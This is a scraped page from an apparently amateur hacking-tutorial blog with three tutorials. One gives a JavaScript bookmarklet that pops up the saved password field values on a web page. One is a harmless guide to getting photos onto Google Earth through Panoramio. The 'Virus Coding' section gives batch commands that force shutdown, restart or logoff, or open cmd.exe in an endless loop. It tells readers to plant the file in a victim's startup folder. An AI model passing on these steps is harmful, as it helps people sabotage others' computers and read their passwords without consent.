Asterisk Password Viewer

Hack a any account is illegal, we are teaching you this to prevent you from these scams. You will be responsible if you hack any account.

There is just a javascript code for that which will show password of a page.

How to use?

  • Copy the below code:

(function(){var s,F,j,f,i; s = “”; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == “password”) s += f[i].value + “\n”; } } if (s) alert(“Passwords in forms on this page [Hackalone.com]:\n\n” + s); else alert(“There are no passwords in forms on this page [Hackalone.com].”);})();


  • Now go to the page that is containing password.
  • Type javascript: then paste the copied code.[Dont give space after javascript:]
  • Hit enter and a pop-up alert will come containing the password of that page.
If you like this then please Comment [Comment box is located after this tutorial] & Like [Like button is also given below].

Add Your Images to Google Earth

As the name says, add your images to Google Earth, in just a few simple steps.
Yes, its so easy.

Requirement:
1.You must have the original image of the location or object.

First of all, visit this url www.panoramio.com
Then, signup there, a google account will work, because panoramio is a part of google.
Now, login and upload your images there, you can upload upto 10 images at a time, and then give title and description to each image.
After that, your images will not be published in Google Earth, you have to do an important work now.
These below steps are important to publish your images in google earth.

  • Open each image one by one.
  • You will find an option, “Map this image” on your right screen.
  • Click on it.
  • Search the place by typing keywords, like Goal Ghar, Patna, etc.
  • It will show a map with Goal Ghar.
  • Place the marker where you wanna show your image in google earth.
  • And click on save.
  • All done from your part.
  • Now, google earth team will review these images and will approve/disapprove it.
  • Reviewing may take some time, normal time is 2 or 3 days.
  • And, if they approve it, your images will be published at Google Earth.Important Notes:
  • Your images will be published to Google Earth only if the Google Earth team approve it.
  • After approval your images may take few days to show in Google Earth, because panoramio takes some time to transfer images to Google Earth, the normal time of transfer after approval is 10 to 20 days.Things to remember:
  • Give suitable and perfect titles in english language.
  • Add a good description of each images.
  • MUST map it or your images will not be reviewed and selected.

Some Important status by panoramio and its meaning:

This photo is selected for Google Earth.
This status means your image has been selected for Google Earth, and will be published as soon as possible.
This photo has not yet been reviewed.
This status means your image is still waiting for approval by Google Earth Team.
This photo has not been selected for Google Earth.
This status means, your image has been disapproved, and wont be published at Google Earth.

Now, you know everything about adding images to google earth.

If you like this then please Comment [Comment box is located after this tutorial] & Like [Like button is also given below].

Virus Coding

This tutorial is for educational purpose only.

First open notepad, (win+r and now type notepad and hit enter), now type this command,

Code is given below:

c:\windows\system32\shutdown -l

for logoff, or,

c:\windows\system32\shutdown -r -f -t 00

for restart, or,

c:\windows\system32\shutdown -s -f -t 00

for shutdown,

:x
start cmd.exe
goto x 

to run cmd in infinite loop,

and save it with any name you want, for example srbunty.bat, use only one command per bat file.
Now, you have a virus.
The main work to do, place the virus to victim’s system.
You have to copy and paste this virus to its right location,(This is the most important, if you wont do it, it wont work and it is neutral now).
Open “My Computer” and write “startup” at the location/url bar and hit enter.
And, it will open system startup folder, paste bat file there.
And, now all done.
When the system get started, it will follow your given command.
Action will depend on your given command, like logoff, shutdown, or restart. You can test it yourself, but read the how to restore your system first.

How to restore your system:
If your victim have low knowledge then he/she will format and reinstall its os to get rid of it, but you can do it in just few seconds, just restart your system and at the boot screen type F8(Hold it), and it will ask some options, like last known good configuation, etc you will find an option there i.e. safe mode, start the system in safe mode and go the the system startup folder and delete your bat file.

Extension: .bat

If you like this then please Comment [Comment box is located after this tutorial] & Like [Like button is also given below].